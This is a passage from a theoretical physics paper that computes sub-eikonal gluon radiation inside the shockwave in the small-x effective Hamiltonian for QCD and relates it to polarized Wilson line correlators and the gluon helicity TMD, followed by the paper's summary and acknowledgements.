On the other hand, one has \[\begin{split}&\mathrm{Tr}\Big{[}T^{b}U_{\mathbf{x}_{1}}[+\infty,x_{1}^ {+}]T^{e}U_{\mathbf{x}_{1}}[x_{1}^{+},-\infty]U_{\mathbf{x}_{2}}^{\dagger} \Big{]}f^{ecd}U_{\mathbf{x}_{1}}^{bd}[+\infty,x_{1}^{+}]\\ =&\frac{1}{2}iN_{c}\mathrm{Tr}\Big{[}U_{\mathbf{x}_{ 1}}[+\infty,x_{1}^{+}]T^{c}U_{\mathbf{x}_{1}}[x_{1}^{+},-\infty]U_{\mathbf{x}_ {2}}^{\dagger}\Big{]}.\end{split} \tag{121}\] The final result for \(\mathcal{M}_{\mathrm{I}}\) is \[\mathcal{M}_{\mathrm{I}}=2g^{2}N_{c}\int_{\delta k^{+}}\frac{dp_{1}^{+}}{p_{1 }^{+}}\frac{1}{(2\pi)^{2}}\frac{\epsilon^{ij}(\mathbf{x}_{2}-\mathbf{x}_{1})^ {j}}{|\mathbf{x}_{2}-\mathbf{x}_{1}|^{2}}\frac{1}{2k^{+}}\frac{1}{2}\int_{- \infty}^{+\infty}dx_{1}^{+}\mathrm{Tr}\Big{[}U_{\mathbf{x}_{1}}[+\infty,x_{1} ^{+}]\overleftarrow{\mathcal{D}}_{\mathbf{x}_{1}}^{i}U_{\mathbf{x}_{1}}[x_{1}^ {+},-\infty]U_{\mathbf{x}_{2}}^{\dagger}\Big{]}. \tag{122}\] We carry out similar analysis for the second diagram in Fig. 5. Its expression is (123) The two field correlation function with the ordering \(x_{2}^{+}<x_{1}^{+}\) is computed by \[\begin{split}&\int_{-\infty}^{-L^{+}}dx_{2}^{+}\Big{\langle}A_{b}^{ -}(x_{2}^{+},0^{-},\mathbf{x}_{2})A_{d}^{j}(x_{1}^{+},0^{-},\mathbf{x}_{1}) \Big{\rangle}\\ =&\int_{-\infty}^{-L^{+}}dx_{2}^{+}\int_{p_{1}^{+}, p_{2}^{+},\mathbf{p}_{1},\mathbf{p}_{2}}\Big{[}e^{-i\frac{\mathbf{p}_{1}^{2}}{2p _{1}^{+}}x_{1}^{+}}e^{i\mathbf{p}_{1}\cdot\mathbf{x}_{1}}e^{i\frac{\mathbf{p}_{ 2}^{2}}{2p_{2}^{+}}x_{2}^{+}}e^{-i\mathbf{p}_{2}\cdot\mathbf{x}_{2}}\frac{ \mathbf{p}_{2}^{j}}{p_{2}^{+}}\int d\mathbf{w}_{1}e^{-i\mathbf{p}_{1}\cdot \mathbf{w}_{1}}e^{i\mathbf{p}_{2}\cdot\mathbf{w}_{1}}\\ &\qquad\times(2\pi)2p_{1}^{+}\delta(p_{2}^{+}-p_{1}^{+})U_{ \mathbf{w}_{1}}^{db}(x_{1}^{+},-L^{+})\Big{]}\\ =&\int_{p_{1}^{+}}e^{i\frac{\partial_{\mathbf{x}_{1}} ^{2}}{2p_{1}^{+}}x_{1}^{+}}e^{i\frac{\partial_{\mathbf{x}_{2}}^{2}}{2p_{2}^{+ }}L^{+}}\frac{2}{2\pi}\frac{(\mathbf{x}_{1}-\mathbf{x}_{2})^{j}}{|\mathbf{x}_ {1}-\mathbf{x}_{2}|^{2}}U_{\mathbf{x}_{1}}^{db}(x_{1}^{+},-L^{+})\\ \simeq&-\int_{\delta k^{+}}\frac{dp_{1}^{+}}{p_{1}^{+ }}\frac{1}{(2\pi)^{2}}\frac{(\mathbf{x}_{2}-\mathbf{x}_{1})^{j}}{|\mathbf{x}_ {2}-\mathbf{x}_{1}|^{2}}U_{\mathbf{x}_{1}}^{db}(x_{1}^{+},-L^{+}).\end{split} \tag{124}\] Compared to the corrrelation function obtained in eq. (4.22), an extra minus sign shows up, apart from the difference in Wilson line color indices. We used the integration over \(x_{2}^{+}\), this time from \(-\infty\) to \(-L^{+}\). \[\int_{-\infty}^{-L^{+}}dx_{2}^{+}e^{i\frac{\mathbf{p}_{2}^{2}}{2p_{2}^{2}}x_{2}^ {+}}=-i\frac{2p_{2}^{+}}{\mathbf{p}_{2}^{2}}e^{-i\frac{\mathbf{p}_{2}^{2}}{2p_{2 }^{2}}L^{+}}. 
\tag{4.29}\] The two Wilson line structures in \(\mathcal{M}_{\rm II}\) become \[\begin{split}&\mathrm{Tr}\Big{[}U_{\mathbf{x}_{1}}[+\infty,x_{1}^{+}] T^{e}U_{\mathbf{x}_{1}}[x_{1}^{+},-\infty]T^{b}U_{\mathbf{x}_{2}}^{\dagger} \Big{]}\partial_{\mathbf{x}_{1}}^{i}U_{\mathbf{x}_{1}}^{eb}(x_{1}^{+},- \infty)\\ =& N_{c}\mathrm{Tr}\Big{[}U_{\mathbf{x}_{1}}[+\infty, x_{1}^{+}]\partial_{\mathbf{x}_{1}}^{i}U_{\mathbf{x}_{1}}[x_{1}^{+},-\infty]U_{ \mathbf{x}_{2}}^{\dagger}\Big{]}-\mathrm{Tr}\Big{[}T^{h}U_{\mathbf{x}_{1}}[+ \infty,x_{1}^{+}]\partial_{\mathbf{x}_{1}}^{i}U_{\mathbf{x}_{1}}[x_{1}^{+},- \infty]T^{b}U_{\mathbf{x}_{2}}^{\dagger}\Big{]}U_{\mathbf{x}_{1}}^{hb}\\ =&\frac{1}{2}N_{c}\mathrm{Tr}\Big{[}U_{\mathbf{x}_{1}} [+\infty,x_{1}^{+}]\partial_{\mathbf{x}_{1}}^{i}U_{\mathbf{x}_{1}}[x_{1}^{+}, -\infty]U_{\mathbf{x}_{2}}^{\dagger}\Big{]}\end{split} \tag{4.30}\] and \[\begin{split}&\mathrm{Tr}\Big{[}U_{\mathbf{x}_{1}}[+\infty,x_{1}^{+}] T^{e}U_{\mathbf{x}_{1}}[x_{1}^{+},-\infty]T^{b}U_{\mathbf{x}_{2}}^{\dagger} \Big{]}U_{\mathbf{x}_{1}}^{db}(x_{1}^{+},-\infty)f^{ecd}\\ =&-\frac{1}{2}iN_{c}\mathrm{Tr}\Big{[}U_{\mathbf{x} _{1}}[+\infty,x_{1}^{+}]T^{c}U_{\mathbf{x}_{1}}[x_{1}^{+},-\infty]U_{\mathbf{ x}_{2}}^{\dagger}\Big{]}.\end{split} \tag{4.31}\] The final result for \(\mathcal{M}_{\rm II}\) is \[\mathcal{M}_{\rm II}=-2g^{2}N_{c}\int_{\delta k^{+}}\frac{dp_{1}^{+}}{p_{1}^{ +}}\frac{1}{(2\pi)^{2}}\frac{\epsilon^{ij}(\mathbf{x}_{2}-\mathbf{x}_{1})^{j} }{|\mathbf{x}_{2}-\mathbf{x}_{1}|^{2}}\frac{1}{2k^{+}}\frac{1}{2}\int_{-\infty }^{+\infty}dx_{1}^{+}\mathrm{Tr}\Big{[}U_{\mathbf{x}_{1}}[+\infty,x_{1}^{+}] \overrightarrow{\mathcal{D}}_{\mathbf{x}_{1}}^{i}U_{\mathbf{x}_{1}}[x_{1}^{+ },-\infty]U_{\mathbf{x}_{2}}^{\dagger}\Big{]} \tag{4.32}\] Summing up \(\mathcal{M}_{\rm I}\) and \(\mathcal{M}_{\rm II}\), one obtains \[\mathcal{M}_{\rm I}+\mathcal{M}_{\rm II}=\frac{2\alpha_{s}N_{c}\Delta y}{\pi} \frac{\epsilon^{ij}(\mathbf{x}_{1}-\mathbf{x}_{2})^{j}}{|\mathbf{x}_{1}- \mathbf{x}_{2}|^{2}}\Big{\langle}\mathrm{Tr}\left[U_{\mathbf{x}_{1}}^{i\Omega [2]}U_{\mathbf{x}_{2}}^{\dagger}\right]\Big{\rangle}. \tag{4.33}\] Eq. (4.33) is the main result of this section. It characterizes that gluon radiation inside the shockwave contributes to the rapidity evolution of chromo-magnetically polarized Wilson line correlator. Interestingly, the contribution is in the form of chromo-electrically polarized Wilson line correlator. It is a single logarithmic contribution \(\int_{\delta k^{+}}dp_{1}^{+}/p_{1}^{+}=\Delta y=\ln\frac{1}{x}\). #### 4.2.2 Directly calculating the diagrams In this section, we directly calculate the two diagrams in Fig. 5. 
The scattering amplitude for two incoming gluons and two outgoing gluons is calculated by \[\begin{split}&\langle 0|\hat{a}_{c^{\prime},\lambda^{\prime}}(p_{2}^{ \prime+},\mathbf{x}_{2}^{\prime})\hat{a}_{c^{\prime},\lambda^{\prime}}(p_{1}^ {\prime+},\mathbf{x}_{1}^{\prime})\hat{S}(+\infty,-\infty)\hat{a}_{c,\lambda _{2}}^{\dagger}(p_{2}^{+},\mathbf{x}_{2})\hat{a}_{c,\lambda_{1}}^{\dagger}(p_{ 1}^{+},\mathbf{x}_{1})|0\rangle\\ =&\langle 0|\hat{a}_{c^{\prime},\lambda^{\prime}}(p_{2}^{ \prime+},\mathbf{x}_{2}^{\prime})\hat{a}_{c^{\prime},\lambda^{\prime}}(p_{1}^ {\prime+},\mathbf{x}_{1}^{\prime})\hat{S}(+\infty,L^{+})\hat{S}(L^{+},-L^{+}) \hat{a}_{c,\lambda_{2}}^{\dagger}(p_{2}^{+},\mathbf{x}_{2})\hat{a}_{c,\lambda _{1}}^{\dagger}(p_{1}^{+},\mathbf{x}_{1})|0\rangle\\ &+\langle 0|\hat{a}_{c^{\prime},\lambda^{\prime}}(p_{2}^{ \prime+},\mathbf{x}_{2}^{\prime})\hat{a}_{c^{\prime},\lambda^{\prime}}(p_{1}^ {\prime+},\mathbf{x}_{1}^{\prime})\hat{S}(L^{+},-L^{+})\hat{S}(-L^{+},-\infty) \hat{a}_{c,\lambda_{2}}^{\dagger}(p_{2}^{+},\mathbf{x}_{2})\hat{a}_{c,\lambda _{1}}^{\dagger}(p_{1}^{+},\mathbf{x}_{1})|0\rangle\end{split} \tag{4.34}\] The incoming two gluons have the same color indices. The same is true for the two outgoing gluons. The two outgoing gluons also have the same polarization. Repeated indices are summed over. For generality, we keep all the longitudinal momentum and transverse coordinates different. The first term in eq. (4.3), only considering the part corresponding to the first diagram in Fig. 5, is further expressed by \[\langle 0|\hat{a}_{c^{\prime},\lambda^{\prime}}(p_{2}^{\prime+}, \mathbf{x}_{2}^{\prime})\hat{a}_{c^{\prime},\lambda^{\prime}}(p_{1}^{\prime+}, \mathbf{x}_{1}^{\prime})\hat{S}(+\infty,L^{+})\hat{S}(L^{+},-L^{+})\hat{a}_{c, \lambda_{2}}^{\dagger}(p_{2}^{+},\mathbf{x}_{2})\hat{a}_{c,\lambda_{1}}^{ \dagger}(p_{1}^{+},\mathbf{x}_{1})|0\rangle\] \[= \sum_{e,e_{2},\kappa,\kappa_{2}}\int_{q^{+},q^{+},\mathbf{y}^{2},\mathbf{y}^{2},\mathbf{y}}\langle 0|\hat{a}_{c^{\prime},\lambda^{\prime}}(p_{2}^{ \prime+},\mathbf{x}_{2}^{\prime})\hat{S}(+\infty,L^{+})\hat{a}_{e_{2},\kappa_ {2}}^{\dagger}(q^{+},\mathbf{y}_{2})\hat{a}_{e,\kappa}^{\dagger}(q^{+}, \mathbf{y})|0\rangle\] \[\qquad\times\langle 0|\hat{a}_{e_{2},\kappa_{2}}(q_{2}^{+}, \mathbf{y}_{2})\hat{W}(L^{+},-L^{+})\hat{a}_{c,\lambda_{2}}^{\dagger}(p_{2}^{+ },\mathbf{x}_{2})|0\rangle\] \[\qquad\times\langle 0|\hat{a}_{e,\kappa}(q^{+},\mathbf{y})\hat{a}_{c^ {\prime},\lambda^{\prime}}(p_{1}^{\prime+},\mathbf{x}_{1}^{\prime})\hat{S}(L^ {+},-L^{+})\hat{a}_{c,\lambda_{1}}^{\dagger}(p_{1}^{+},\mathbf{x}_{1})|0\rangle\] \[= \sum_{e,\kappa,\kappa}\int_{q^{+},\mathbf{y}}e^{i(p_{2}^{\prime-} -p_{2}^{-}-q^{-}+i\epsilon)L^{+}}\Big{[}\psi_{I}^{g\to gg}(\{p_{2}^{ \prime+},\mathbf{x}_{2}^{\prime},c^{\prime},\lambda^{\prime}\};\{q^{+}, \mathbf{y},e,\kappa\},\{p_{2}^{+},\mathbf{x}_{2},h,\lambda_{2}\})\Big{]}^{*}\] \[\qquad\times U_{\mathbf{x}_{2}}^{hc}(L^{+},-L^{+})M_{3}^{g\to gg }(\{p_{1}^{+},\mathbf{x}_{1},c,\lambda_{1}\};\{q^{+},\mathbf{y},e,\kappa\}, \{p_{1}^{\prime+},\mathbf{x}_{1}^{\prime},c^{\prime},\lambda^{\prime}\}) \tag{4.35}\] We have expanded \(\hat{S}(+\infty,L^{+})\) to linear order in strong coupling constant. The amplitude \(M_{3}^{g\to gg}\) has been computed in eq. (4.3), representing background field induced gluon radiation. Note that we let the gluon \(\{q^{+},\mathbf{y},e,\kappa\}\) be the soft gluon. 
In the limit that \(q^{+}\ll p_{1}^{+}\), the longitudinal momentum conservation leads to \(p_{1}^{+}=p_{1}^{\prime+}\) as expected for sub-eikonal order processes. We only kept the part of the polarization factor that will eventually give terms linear in the polarization of the incoming gluons. The initial state gluon splitting wavefunction \(\psi_{I}^{g\to gg}\) has also been computed in eq. (B). In the limit that \(q^{+}\ll p_{2}^{+}\), the longitudinal momentum conservation enforces that \(p_{2}^{+}=p_{2}^{\prime+}\). Using these explicit expressions, \(\mathcal{M}_{\rm I}\) becomes \[\mathcal{M}_{\rm I}= \sum_{e,\kappa,\int_{q^{+}}}e^{i(p_{2}^{\prime-}-p_{2}^{-}-q^{-}+ i\epsilon)L^{+}}(-2\lambda_{1}\delta_{\lambda_{1}\lambda_{2}})g^{2}\frac{i}{2\pi} \frac{i\epsilon^{ij}(\mathbf{x}_{1}-\mathbf{x}_{2})^{j}}{|\mathbf{x}_{1}- \mathbf{x}_{2}|^{2}}T^{e}_{c^{\prime}h}U^{hc}_{\mathbf{x}_{2}}(L^{+},-L^{+}) \tag{4.36}\] \[\times\frac{1}{2p_{1}^{+}}\int_{-L^{+}}^{L^{+}}dw^{+}\Big{(}if^{ d\epsilon^{\prime}h^{\prime}}\left[-2\partial_{\mathbf{x}_{1}}^{i}U^{ee^{\prime}}_{ \mathbf{x}_{1}}(L^{+},w^{+})U^{c^{\prime}h^{\prime}}_{\mathbf{x}_{1}}(L^{+},w^ {+})U^{dc}_{\mathbf{x}_{1}}(w^{+},-L^{+})\right]\] \[+iga_{b}^{i}(\mathbf{x}_{1})U^{ee^{\prime}}_{\mathbf{x}_{1}}(L^{ +},w^{+})U^{c^{\prime}h^{\prime}}_{\mathbf{x}_{1}}(L^{+},w^{+})U^{dc}_{ \mathbf{x}_{1}}(w^{+},-L^{+})2(T^{d}T^{e^{\prime}})_{h^{\prime}b}\Big{)}\] We have discarded the factors characterizing longitudinal momentum conservation and transverse coordinate conservation. The Wilson line structures are further simplified \[T^{e}_{c^{\prime}h}U^{hc}_{\mathbf{x}_{2}}(L^{+},-L^{+})if^{d \epsilon^{\prime}h^{\prime}}\left[-2\partial_{\mathbf{x}_{1}}^{i}U^{ee^{ \prime}}_{\mathbf{x}_{1}}(L^{+},w^{+})U^{c^{\prime}h^{\prime}}_{\mathbf{x}_{1} }(L^{+},w^{+})U^{dc}_{\mathbf{x}_{1}}(w^{+},-L^{+})\right] \tag{4.37}\] \[= -N_{c}{\rm Tr}\left[\partial_{\mathbf{x}_{1}}^{i}U_{\mathbf{x} _{1}}(L^{+},w^{+})U_{\mathbf{x}_{1}}(w^{+},-L^{+})U^{\dagger}_{\mathbf{x}_{2}}(L ^{+},-L^{+})\right]\] and \[iga_{b}^{i}(\mathbf{x}_{1})U^{ee^{\prime}}_{\mathbf{x}_{1}}(L^{+ },w^{+})U^{c^{\prime}h^{\prime}}_{\mathbf{x}_{1}}(L^{+},w^{+})U^{dc}_{\mathbf{x} _{1}}(w^{+},-L^{+})2(T^{d}T^{e^{\prime}})_{h^{\prime}b}T^{e}_{c^{\prime}h}U^{hc }_{\mathbf{x}_{2}}(L^{+},-L^{+}) \tag{4.38}\] \[= N_{c}{\rm Tr}[U_{\mathbf{x}_{1}}(L^{+},w^{+})iga^{i}(\mathbf{x} _{1})U_{\mathbf{x}_{1}}(w^{+},-L^{+})U^{\dagger}_{\mathbf{x}_{2}}(L^{+},-L^{+})].\] The final result for \(\mathcal{M}_{\rm I}\) is \[\begin{split}\mathcal{M}_{\rm I}=&\lambda_{1}\delta_{ \lambda_{1}\lambda_{2}}g^{2}N_{c}\frac{\Delta y}{2\pi}\frac{i}{2\pi}\frac{i \epsilon^{ij}(\mathbf{x}_{1}-\mathbf{x}_{2})^{j}}{|\mathbf{x}_{1}-\mathbf{x}_ {2}|^{2}}\\ &\qquad\times\frac{1}{2p^{+}}\int_{-L^{+}}^{L^{+}}dw^{+}{\rm Tr} \left[U_{\mathbf{x}_{1}}(L^{+},w^{+})\overleftarrow{\mathcal{D}}^{i}_{ \mathbf{x}_{1}}U_{\mathbf{x}_{1}}(w^{+},-L^{+})U^{\dagger}_{\mathbf{x}_{2}}(L^ {+},-L^{+})\right].\end{split} \tag{4.39}\] The integration over longitudinal momentum gives \(\int dq^{+}/q^{+}=\Delta y\). We analyze the second term in eq. (4.34), corresponding to the second diagram in Fig. 5. 
\[\begin{split}&\langle 0|\hat{a}_{c^{\prime},\lambda^{\prime}}(p_{2}^{ +},\mathbf{x}_{2}^{\prime})\hat{a}_{c^{\prime},\lambda^{\prime}}(p_{1}^{\prime +},\mathbf{x}_{1}^{\prime})\hat{S}(L^{+},-L^{+})\hat{S}(-L^{+},-\infty)\hat{a }_{c,\lambda_{2}}^{\dagger}(p_{2}^{+},\mathbf{x}_{2})\hat{a}_{c,\lambda_{1}} ^{\dagger}(p_{1}^{+},\mathbf{x}_{1})|0\rangle\\ =&\sum_{e,e_{2},\kappa,\kappa_{2}}\int_{q^{+},q_{2}^{ +},\mathbf{y}_{2},\mathbf{y}}\langle 0|\hat{a}_{c^{\prime},\lambda^{\prime}}(p_{2}^{ \prime+},\mathbf{x}_{2}^{\prime})\hat{W}(L^{+},-L^{+})\hat{a}_{e_{2},\kappa_{ 2}}^{\dagger}(q_{2}^{+},\mathbf{y}_{2})|0\rangle\\ &\qquad\times\langle 0|\hat{a}_{c^{\prime},\lambda^{\prime}}(p_{1}^{ \prime+},\mathbf{x}_{1}^{\prime})\hat{S}(L^{+},-L^{+})\hat{a}_{c,\lambda_{1}} ^{\dagger}(p_{1}^{+},\mathbf{x}_{1})\hat{a}_{c,\kappa}^{\dagger}(q^{+}, \mathbf{y})|0\rangle\\ &\qquad\times\langle 0|\hat{a}_{e,\kappa}(q^{+},\mathbf{y})\hat{a}_{e _{2},\kappa_{2}}(q_{2}^{+},\mathbf{y}_{2})\hat{S}(-L^{+},-\infty)\hat{a}_{c, \lambda_{2}}^{\dagger}(p_{2}^{+},\mathbf{x}_{2})|0\rangle\\ =&\sum_{e,e_{2},\kappa}\int_{q^{+},\mathbf{y}}e^{i(p _{2}^{-}-q^{-}-p_{2}^{\prime-}+i\epsilon)L^{+}}U^{c^{\prime}e_{2}}_{\mathbf{x }_{2}^{\prime}}(L^{+},-L^{+})\psi_{I}^{g\to gg}(\{p_{2}^{+},\mathbf{x}_{2},c, \lambda_{2}\};\{q^{+},\mathbf{y},e,\kappa\},\{p_{2}^{\prime+},\mathbf{x}_{2}^ {\prime},e_{2},\lambda^{\prime}\})\\ &\qquad\times\left[M_{3}^{g\to gg}(\{p_{1}^{\prime+},\mathbf{x}_{ 1}^{\prime},c^{\prime},\lambda^{\prime}\};\{q^{+},\mathbf{y},e,\kappa\},\{p_ {1}^{+},\mathbf{x}_{1},c,\lambda_{1}\})\right|_{L^{+}\leftrightarrow-L^{+}} \right]^{*}\end{split} \tag{4.40}\] Note that one has to exchange the role of \(L^{+}\) and \(-L^{+}\) when using the expression of \(M_{3}^{g\to gg}\) calculated before. 
Using these explicit expressions, \(\mathcal{M}_{\rm II}\) becomes \[\begin{split}\mathcal{M}_{\rm II}=&\sum_{e,e_{2}, \kappa}\int_{q^{+}}e^{i(p_{2}^{-}-q^{-}-p_{2}^{\prime-}+i\epsilon)L^{+}}g^{2}(-2 \lambda_{1}\delta_{\lambda_{1}\lambda_{2}})\frac{i}{2\pi}\frac{i\epsilon^{ij}( \mathbf{x}_{1}-\mathbf{x}_{2})^{j}}{|\mathbf{x}_{1}-\mathbf{x}_{2}|^{2}}U^{c ^{\prime}e_{2}}_{\mathbf{x}_{2}}(L^{+},-L^{+})T^{e}_{e_{2}c}\\ &\qquad\times\frac{1}{2p_{1}^{+}}\int_{-L^{+}}^{L^{+}}dw^{+} \Big{(}if^{h^{\prime}e^{\prime}h}\left[-2\partial_{\mathbf{x}_{1}}^{i}U^{c^{ \prime}e}_{\mathbf{x}_{1}}(w^{+},-L^{+})U^{hc}_{\mathbf{x}_{1}}(w^{+},-L^{+}) U^{c^{\prime}h^{\prime}}_{\mathbf{x}_{1}}(L^{+},w^{+})\right]\\ &\qquad+iga_{b}^{i}(\mathbf{x}_{1})U^{e^{\prime}e}_{\mathbf{x}_{1 }}(w^{+},-L^{+})U^{hc}_{\mathbf{x}_{1}}(w^{+},-L^{+})U^{c^{\prime}h^{\prime}}_{ \mathbf{x}_{1}}(L^{+},w^{+})2(T^{h^{\prime}}T^{e^{\prime}})_{hb}\Big{)}\end{split} \tag{4.41}\] Again, the Wilson line structures can be simplified as \[\begin{split}& if^{h^{\prime}e^{\prime}h}\left[-2\partial_{\mathbf{x }_{1}}^{i}U^{e^{\prime}e}_{\mathbf{x}_{1}}(w^{+},-L^{+})U^{hc}_{\mathbf{x}_{1 }}(w^{+},-L^{+})U^{c^{\prime}h^{\prime}}_{\mathbf{x}_{1}}(L^{+},w^{+})\right]U ^{c^{\prime}e_{2}}_{\mathbf{x}_{2}}(L^{+},-L^{+})T^{e}_{e_{2}c}\\ =& N_{c}{\rm Tr}[U_{\mathbf{x}_{1}}(L^{+},w^{+}) \partial_{\mathbf{x}_{1}}^{i}U_{\mathbf{x}_{1}}(w^{+},-L^{+})U^{\dagger}_{ \mathbf{x}_{2}}]\end{split} \tag{4.42}\] and \[\begin{split}&iga_{b}^{i}(\mathbf{x}_{1})U^{e^{\prime}e}_{\mathbf{x }_{1}}(w^{+},-L^{+})U^{hc}_{\mathbf{x}_{1}}(w^{+},-L^{+})U^{c^{\prime}h^{\prime}} _{\mathbf{x}_{1}}(L^{+},w^{+})2(T^{h^{\prime}}T^{e^{\prime}})_{hb}U^{c^{\prime} e_{2}}_{\mathbf{x}_{2}}(L^{+},-L^{+})T^{e}_{e_{2}c}\\ =& N_{c}{\rm Tr}\left[U_{\mathbf{x}_{1}}(L^{+},w^{+})iga^{i}( \mathbf{x}_{1})U_{\mathbf{x}_{1}}(w^{+},-L^{+})U^{\dagger}_{\mathbf{x}_{2}}(L^{+},-L ^{+})\right]\end{split} \tag{4.43}\] he final result for the second amplitude is \[\mathcal{M}_{\rm II}=-\lambda_{1}\delta_{\lambda_{1}\lambda_{2}}g^{2}N_{c}\frac{ \Delta y}{2\pi}\frac{i}{2\pi}\frac{i\epsilon^{ij}(\mathbf{x}_{1}-\mathbf{x}_{2} )^{j}}{|\mathbf{x}_{1}-\mathbf{x}_{2}|^{2}}\frac{1}{2p_{1}^{+}}\int_{-L^{+}}^{ L^{+}}dw^{+}{\rm Tr}[U_{\mathbf{x}_{1}}(L^{+},w^{+})\overrightarrow{\mathcal{D}}_{ \mathbf{x}_{1}}^{i}U_{\mathbf{x}_{1}}(w^{+},-L^{+})U_{\mathbf{x}_{2}}^{\dagger }]. \tag{111}\] Combining the two amplitudes \[\mathcal{M}_{\rm I}+\mathcal{M}_{\rm II}\] \[= -\lambda_{1}\delta_{\lambda_{1}\lambda_{2}}g^{2}N_{c}\frac{\Delta y }{2\pi}\frac{i}{2\pi}\frac{i\epsilon^{ij}(\mathbf{x}_{1}-\mathbf{x}_{2})^{j} }{|\mathbf{x}_{1}-\mathbf{x}_{2}|^{2}}\frac{1}{2p_{1}^{+}}\int_{-L^{+}}^{L^{+ }}dw^{+}{\rm Tr}\left[U_{\mathbf{x}_{1}}(L^{+},w^{+})(\overrightarrow{ \mathcal{D}}_{\mathbf{x}_{1}}^{i}-\overleftarrow{\mathcal{D}}_{\mathbf{x}_{1} }^{i})U_{\mathbf{x}_{1}}(w^{+},-L^{+})U_{\mathbf{x}_{2}}^{\dagger}\right]\] \[= \lambda_{1}\delta_{\lambda_{1}\lambda_{2}}\frac{2\alpha_{s}N_{c} \Delta y}{\pi}\frac{\epsilon^{ij}(\mathbf{x}_{1}-\mathbf{x}_{2})^{j}}{| \mathbf{x}_{1}-\mathbf{x}_{2}|^{2}}{\rm Tr}[U_{\mathbf{x}_{1}}^{iG[2]}U_{ \mathbf{x}_{2}}^{\dagger}]. \tag{112}\] The results of the two amplitudes coincide with eq. (105). From the above expression, one can see that there is no tranvserle coordinate integration. Therefore, these two diagrams only contribute in the single logarithmic approximation [32]. One could also draw diagrams as shown in Fig. 6. 
However, these two diagrams vanish because the background field induced triple gluon vertex is local in transverse coordinates while the soft gluon radiation is nonlocal in transverse coordinates.

We used two examples to show the importance of gluon radiation inside the shockwave. It contributes both to the longitudinal double-spin asymmetry of soft gluon production and to the rapidity evolution of the polarized Wilson line correlator. It turns out that in both cases, the final result is related to the chromo-electrically polarized Wilson line correlator \(\langle{\rm Tr}[U_{\mathbf{x}}^{iG[2]}U_{\mathbf{y}}^{\dagger}]\rangle\). In [12], it has been derived that the small \(x\) limit of the gluon helicity TMD is directly related to \(\langle{\rm Tr}[U_{\mathbf{x}}^{iG[2]}U_{\mathbf{y}}^{\dagger}]\rangle\),
\[\Delta G_{L}(x,\mathbf{k}^{2})=\frac{4i}{g^{2}}\epsilon^{ij}\mathbf{k}^{i}\int d^{2}\mathbf{x}d^{2}\mathbf{y}e^{-i\mathbf{k}_{\perp}\cdot(\mathbf{x}-\mathbf{y})}\Big{\langle}{\rm Tr}\left[U_{\mathbf{y}}^{\dagger}U_{\mathbf{x}}^{jG[2]}(k^{+})-U_{\mathbf{y}}^{jG[2]\dagger}(k^{+})U_{\mathbf{x}}\right]\Big{\rangle}. \tag{113}\]
One therefore concludes that the gluon radiation inside the shockwave, manifesting itself in the form of the gluon polarized Wilson line correlator \({\rm Tr}[U_{\mathbf{x}}^{iG[2]}U_{\mathbf{y}}^{\dagger}]\) characterized by the chromo-electric field \(f^{-i}\), is related to the small \(x\) limit of the gluon helicity TMD.

Figure 6: These two diagrams vanish. The red gluon lines represent the background gluon fields.

## Summary

In this paper, we have derived the small-\(x\) effective Hamiltonian for QCD at high energy within the shockwave formalism. The results are given in eqs. (36), (37), (38), valid up to sub-eikonal order. The straightforward continuation of the analysis to higher orders of eikonality is possible but probably very tedious. The use of a Hamiltonian approach to investigate high energy QCD at the eikonal order can be found in [33; 34]. We also established the approach to compute \(S\)-matrix elements up to sub-eikonal order in eq. (21). As an application, various single quark/gluon scattering amplitudes, known as the polarized Wilson lines, are reproduced. This effective Hamiltonian approach, alternative to other approaches [12; 19; 21; 23], has the advantage of directly isolating the relevant interactions up to sub-eikonal order and is particularly suitable to compute spin related observables at small \(x\).

The behavior of the eikonal interaction vertex eq. (36) under rapidity evolution has been carefully examined before, leading to the derivation of the JIMWLK renormalization group equation from a field theoretical approach in [35; 36; 37; 38]. The JIMWLK equation is general in the sense that it can be applied to any spin-independent observable at small \(x\). For example, applying the JIMWLK equation to the dipole correlator generates the Balitsky hierarchy and reproduces the BK equation in the large \(N_{c}\) limit [39; 40]. Currently, the small \(x\) rapidity evolutions beyond eikonal order, particularly those related to spin-dependent observables, are analyzed in an observable-by-observable way. Since we have identified the relevant interaction vertices and propagators at the sub-eikonal order in the small \(x\) effective Hamiltonian, it would be very interesting though challenging to derive a general renormalization group equation that is valid at sub-eikonal order and automatically reproduces the evolution equations when applied to different observables [41; 42].
On the other hand, the small \(x\) effective Hamiltonian approach offers the possibility to bridge high energy QCD to the general methodology of the Hamiltonian formalism. It has been demonstrated that the JIMWLK equation can be reproduced by the quantum Lindblad equation through the quantum-classical correspondence [43; 44]. At the sub-eikonal order, the Hilbert space is enlarged as spin related degrees of freedom start playing a role. It would also be very interesting to see if the Lindblad formalism still applies to small \(x\) helicity evolution using the small \(x\) effective Hamiltonian.

One of the new features of the small-\(x\) effective Hamiltonian at sub-eikonal order is that gluons can be emitted inside the shockwave. This phenomenon has been barely discussed in the literature. We studied its effect in two situations: the longitudinal double-spin asymmetry for soft gluon production in polarized collisions and the rapidity evolution of polarized Wilson lines. In both cases, it is found that the contribution is given by the chromo-electrically polarized Wilson line correlator \(\langle\mathrm{Tr}[U_{\mathbf{x}}^{iG[2]}U_{\mathbf{y}}^{\dagger}]\rangle\), which has been shown to be directly related to the gluon helicity TMD in the small \(x\) limit. It would be very interesting to see how gluon radiation inside the shockwave impacts the small \(x\) rapidity evolutions and particle productions in phenomenological applications.

The small-\(x\) effective Hamiltonian approach is developed within the light-cone quantization framework. As a result, it inevitably inherits the same zero mode problem [26]. Recently, it was pointed out that the chiral anomaly in polarized inclusive deep inelastic scatterings might be sensitive to zero modes [45; 46] (see also [47; 48]), which could have been missed by the current approach. Nevertheless, the small-\(x\) effective Hamiltonian approach provides a systematic way of directly computing spin related observables, including particle and jet productions in the small \(x\) limit. Of particular interest is the double-spin asymmetry for particle and jet productions in longitudinally polarized collisions relevant to experimental measurements at RHIC [49; 50; 51; 52; 53; 54; 55; 56; 57; 58; 59; 60; 61; 62; 63; 64]. This could include productions of neutral pions, \(\eta\)-mesons, charged pions and \(J/\psi\) at midrapidity, intermediate rapidity and forward rapidity, respectively. The double-spin asymmetry for direct photon production has also been measured at RHIC. Applications to deep inelastic scatterings relevant to the future EIC would also be very interesting. We plan to study these observables in future works.

I thank Yuri Kovchegov for very helpful and inspiring discussions. I am grateful to Daniel Adamiak for discussions and checking many equations in the paper. I also appreciate very interesting conversations with Florian Cougoulic and Guillaume Beuf on related topics. This material is based upon work supported by the U.S. Department of Energy, Office of Science, Office of Nuclear Physics under Award Number DE-SC0004286.

## Appendix A Boost Transformations of Vector and Spinor Fields

